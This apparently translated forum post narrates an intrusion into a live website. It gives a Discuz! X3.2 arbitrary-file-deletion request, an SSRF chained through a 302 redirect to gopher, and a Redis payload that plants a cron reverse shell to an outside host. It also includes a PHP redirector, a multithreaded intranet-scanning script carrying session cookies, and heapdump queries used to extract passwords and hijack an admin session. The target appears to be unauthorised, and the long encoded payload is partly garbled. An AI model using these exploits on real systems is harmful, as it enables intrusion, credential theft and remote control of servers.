Title: Penetration of large spinach website duck neck

Posted April 10Apr 10

You can find that the jsp and php suffix coexist when registering the main site. It should be that different routes have reversed different middleware, so no vulnerabilities are found.

The forum is Discuz! X3.2

Discuz emergency room was found.

admin.php 403, uc_server and emergency room have no weak passwords.

In 《渗透某盗版游戏网站》, I introduced what vulnerabilities are in the Discuz background, so what about the vulnerabilities in the front desk? Mainly there are arbitrary file deletion, SSRF, and uc_server blasting.

First, delete any file.

POST /home.php?mod=spacecpac=profileop=base

birthprovince=./././info.php

Then POST file to delete info.php

format='https://x.com/home.php?mod=spacecpac=profileop=base'method='POST' enctype='multipart/form-data' input type='file'name='birthprovince' id='file'/input type='text'name='formhash' value='017b5107'/input type='text'name='profilesubmit' value='1'/input type='submit' value='Submit' //Although this vulnerability is not low, it is useless for subsequent penetration. It is difficult for Discuz to install by deleting files.

Let's look at SSRF again.

/forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://qzf9jq.dnslog.cn/1.png[/img]formhash=017b5107

This is an SSRF that does not echo, and can only be judged by time delay.

1. You can directly detect the intranet through http. If the IP survives, it will have a short delay (regardless of whether the port is open or not), and if the IP does not exist, it will have a long delay.

2. The protocol can be changed through 302 jump, and ftp, dict, and gopher can be supported.

Third, the port can be detected through the ftp protocol. If the port is open, it will have a long delay and if the port is closed, it will have a short delay.

First access my VPS through the http protocol to get the real IP of the forum.

163.*. *.35.bc.googleusercontent.com(35.*.*.163)

Then try to blindly call the local redis (here to detect the local ports, it is unreasonable, so I directly blindly call it)

When the gopher protocol attacks redis locally, it is found that it does not need to declare the length of each line of command string with $.

First, see the clear SSRF attack payload

/forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopherip=127.0.0.1port=6379data=_flushall%0d%0aconfigset dir /var/spool/cron/%0d%0aconfig set dbfilename root%0d%0aset 0'\n\n*/1 * * * * * bash -i /dev/tcp/62.1.1.1/566701\n\n'%0d%0asave%0d%0aquit%0d%0axx=1.png[/img]formhash=017b5107

Then, between 302.php? and data=, you need to encode the url, and all strings from data=to xx=1.png are encoded twice, and then packaged in bp.

/forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip=127.0.0.1%26port=6379%26data=%25%35%66%25%36%36%63%25%37%35%25%37%33%25%36%38%25%36%31%25%36%63%25%36%63%25%32%35%25%33%33%25%36%33%25%36%33%25%36%33%25%36%63%25%32%35%25%33% 30%25%36%34%25%32%35%25%33%30%25%36%31%25%36%33%25%36%66%25%36%65%25%36%36%25%36%25%36%39%25%36%37%25%32%30%25%36%25%36%31%25%37%32%30%25%36%32%25%32%30%25%36%32%66%25%37%36%31%25%37%32%25%32%32%66 %25%37%33%25%37%30%25%36%66%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%36%33%25%36%65%25%32%66%25%36%65%25%32%35%25%36%34%25%32%35%25%33%30%25%36%31%25%36%33%25%36%66%25%36%25%36%25%36%25%36%39%25%36%37%25%32%30%2 5%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%32%35%25%33%30%25%36%34%25%32%35%25%33%30%25% 36%31%25%37%33%25%36%35%25%37%34%25%32%30%25%33%30%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%61%25%32%30%25%32%61%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%30%25%32%30%25%36 %32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%66%37%36%25%32%66%25%34%25%36%36%34%25%36%35%25%36%32%66%25%33%31%25%32%66%25%33%31%25%32%66%25%32%65%31%32%65%31%32%6 5%25%33%31%25%32%65%25%33%31%25%32%66%25%33%35%25%33%36%25%33%36%25%33%37%25%32%30%25%33%30%25%33%65%25%32%36%25%33%30%25%33%65%25%32%36%25%33%30%25%33%30%25%36%34%25%32%35%25%33%30%25%33%30%25%33%30%25%36%31% 25%37%33%25%36%31%25%37%36%25%36%35%25%32%35%25%33%30%25%36%34%25%32%35%25%33%30%25%36%31%25%37%31%25%37%35%25%36%39%25%37%34%25%32%35%25%33%30%25%36%31%25%32%36xx=1.png[/img]formhash=017b5107

But it was found that the payload was intercepted by the XSS and SQL injection protection provided by Discuz.

Therefore, payload can only be written in VPS.

?php

$ip=$_GET['ip'];

$port=$_GET['port'];

$scheme=$_GET['s'];

$data='_flushall%0d%0aconfigset dir /var/spool/cron/%0d%0aconfig set dbfilename root%0d%0aset 0'\n\n*/1 * * * * bash -i /dev/tcp/62.1.1.1 /566701\n\n'%0d%0asave%0d%0aquit%0d%0aquit%0d%0a';

header('Location:$scheme://$ip:$port/$data');

Test whether the redis on VPS can be successful/forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip=62.1.1.1%26port=6379%26data=1.png[/img]formhash=017b5107

no problem. However, the utilization failed in the actual environment, the reason is uncertain, it is possible to have no redis, lack of redis permissions or have a password.

I started writing scripts to detect the intranet, but I didn’t have much hope. It is Google Cloud, and it does not necessarily have an intranet.

The ip dictionary of all intranet ips is created

f=open('ip.txt','w')

f.write('127.0.0.1')

f.write('localhost')

for i in range(1,256):

ip='192.168.'+str(i)+'.1'

f.write(ip)

for i in range(16,32):

for ii inrange(1,256):

ip='172.'+str(i)+'.'+str(ii)+'.1'

f.write(ip)

for i in range(1,256):

for ii inrange(1,256):

ip='10.'+str(i)+'.'+str(ii)+'.1'

f.write(ip)

f.close()

Then, use time delay to find the intranet IP segment. Here, since the delay of IP blockage is more than 7s, you must use multiple threads to complete it. Since it is OK to detect whether there is any protocol for IP, I simply use gopher to attack Redis's payload directly, what if I hit it directly.

import requestsimport threadingdef ssrf(i): url='https://x.com/forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip='+i+'%26port=6379%26data=1.png[/img]formhash=017b5107' header={'User-Agent':'Mozilla/5.0(Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip,deflate', 'Connection': 'keep-alive' } cookie={'PNuE_2132_saltkey':'vx3wOD3T','PNuE_2132_auth':'8b46%2F9AD2x2XyfyESVQaytdhS%2FVWrzIGQLWCe3IAr6AIwuX8raGrp%2BgRkMv39ylNO2GAIfHep01AGhxApI0OCyXirNKx'} r=requests.get(url,cookies=cookie,headers=header,allow_redirects=False) if r.elapsed.total_seconds() 6: timeout=str(i)+'port:'+str(r.elapsed.total_seconds()) print(timeout) else: timeout=str(i)+'port:'+str(r.elapsed.total_seconds()) fo=open('openip.txt','a') fo.write(str(i)+'open\n') fo.close() print(str(i)+'open') print(timeout)def thread(list): name=[] for i in list: th=threading.Thread(target=ssrf,args=(i,))) name.append(th) th.start() for th inname: th.join()folist=open('ip.txt','r')list=[]flag=0for i infolist.readlines(): i=i.replace('\n','') if flag 21: list.append(i) flag=flag+1 else: thread(list) flag=0 list=[]Only an open gateway is found 172.30.2.1, then run the intranet IP on this gateway and replace ip.txt.

As a result, after running a day, I only ran out two intranet IPs, 172.30.2.1 and 172.30.2.2. The probability is that 172.30.2.2 is itself, and 172.30.2.1 is the virtual gateway of the cloud server.

Finally, use the ftp protocol to run their ports and just change the script yourself.

Most of them are false alarms, and in fact they only open two ports 80 and 443, so unless other intranet IPs are found later, SSRF is not to be expected.

The last uc_server blast is to change the XFF header to cause the graphic verification code to be fixed, and the use fails. For details, see https://www.freebuf.com/articles/web/197546.html

The forum has come to an end, let’s see what’s wrong with the customer service system.

/res/image.html?id=upload/6c825ed7ea4cd25657288ab4f7d0227f

The id parameter is passed, and the directory cannot be crossed. File upload cannot be used, so start directory scanning.

The admin login interface has slider verification, but it is a scam from the front end and is useless in the back end, so it is fruitless to try to explode.

When you see /actuator, you know it is spring boot and use targeted dictionary to blast.

/swagger-ui.html is empty, /env jumps admin, /heapdump 403.

But I tried it out of no way /heapdump.json

Unzip out the 1G memory file, open it using MemoryAnalyzer, and query OQL.

Since there is no cooperation with /env, I can only blindly check the configuration information. Here are some tips I have figured out.

select* from org.springframework.web.context.support.StandardServletEnvironment check configuration, pay attention to sorting in Retained Heap (size), which is more convenient.

select* from java.lang.String s WHERE toString(s) LIKE '.*password.*'Check strings containing password. This search method is not easy to find the associated class, but you can quickly find login records and so on. If you replace password with http://, you can find some urls.

select* from java.util.Hashtable$Entry x WHERE(toString(x.key).contains('username'))select* from java.util.Hashtable$Entry x WHERE (toString(x.key).contains('password'))select* from java.util.Hashtable$Entry x WHERE (toString(x.key).contains('url'))Select* from java.util.Hashtable$Entry x WHERE (toString(x.key).contains('url')) Quickly check the database related information and found the mysql address account password. However, unfortunately, Amazon's database has an IP whitelist by default and cannot log in remotely.

select* from java.lang.String s WHERE toString(s) LIKE '.*SESSION.*' Found the session being logged in, and log in to the background after replacement.

The background uses the WSSS protocol for real-time conversations, and there are no utilization points in the avatar and customer service reply. Only some wailings of poisonous dogs were found.

The black box test was fruitless. I searched for the featured class names in heapdump, and then searched on github. I found a copy of the source code that might be the initial version, and the target was a revision, but the source code was not very complete.